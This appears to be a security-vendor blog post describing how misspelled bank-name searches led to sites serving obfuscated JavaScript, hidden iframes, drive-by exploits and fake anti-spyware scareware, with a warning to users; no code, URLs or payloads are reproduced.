This lure relies upon the eventuality that a user will make a typo while entering a term into a search engine. There are an endless number of possible typographical errors for any given term, but with a few algorithms and statistics you can significantly narrow down the number of possibilities. Attackers have been doing this for years and have become very good at predicting the most common typos for each keyword.

To give you an example of how this attack works, I’m going to hit the "x" key instead of "c" key (a surprisingly common typo) while searching Google for the name of my bank. This ends up spelling "banxa" instead of "banca" ("Banca" is "Bank" in Italian). Even though this typo has created a meaningless word, we still get plenty of results from Google:

Warning: Visiting any of the sites mentioned in this article can and likely will compromise your computer. Please do not visit these sites.

Note: The name of the bank has been removed from this screenshot.

The first result looks suspicious enough; I’ll begin my research there. One block of javascript stands out while looking over the source html of this page.

I don’t know what this big block of ugliness does just yet, but something tells me that it isn’t very friendly. Using some of the techniques discussed in our last Malcode of the Week, we quickly de-obfuscate this script back into plain text. Here’s what that block of script actually creates in your browser:

Bad news: a hidden iframe. Following the URL loaded by this iframe, I arrive at a myriad of exploits and drive-by download attempts. At this point I’m pretty confidant that this page is up to no good, but no blog would be complete without screenshots of a workstation being compromised. So, I’m going to visit this page from a protected lab environment and see what it looks like from a victim’s perspective.

Repeating the same Google search and visiting the first result in our browser, I end up being greeted with a blank page prompting to accept an ActiveX control. This page actually attempts numerous exploits (including the recent VML) before resorting to the prompt. If this workstation had not been patched recently, it would have been compromised silently without the prompt. I’m in a cooperative mood, so I’ll answer "Yes" to the ActiveX prompt.

Within seconds of accepting, my browser is closed automatically and my background is changed. I then see a dialog box warning that Spyware has been detected on my system. How thoughtful -- the bad stuff I just installed is letting me know I have bad stuff installed.

This is a familiar type of malware that we have run into many times in the past. It takes the workstation hostage and attempts to convince the owner to purchase multiple bogus "Spyware Remover" applications at ~$50 each.

The same investigation was repeated on the top ten results from Google for this term and every link in the top ten contained some type of malicious code. Nearly identical results are found when repeating the same experiment with other major Italian banks and other with typos in "bank" and "financial". The problem isn't limited to financial sites, either: misspell nearly any search term and you are almost guaranteed to end up at a questionable site.

Conclusion

Someone out there is always trying to get you to visit their website and sometimes the simplest tricks work wonders. The next time you are making a search on the Internet, take an extra second to make sure you got the results you expected before you start following links. One letter can mean the difference between arriving at your online banking site or ending up with a desktop of Spyware.

Researcher: Patrick Comiotto, Websense Security Labs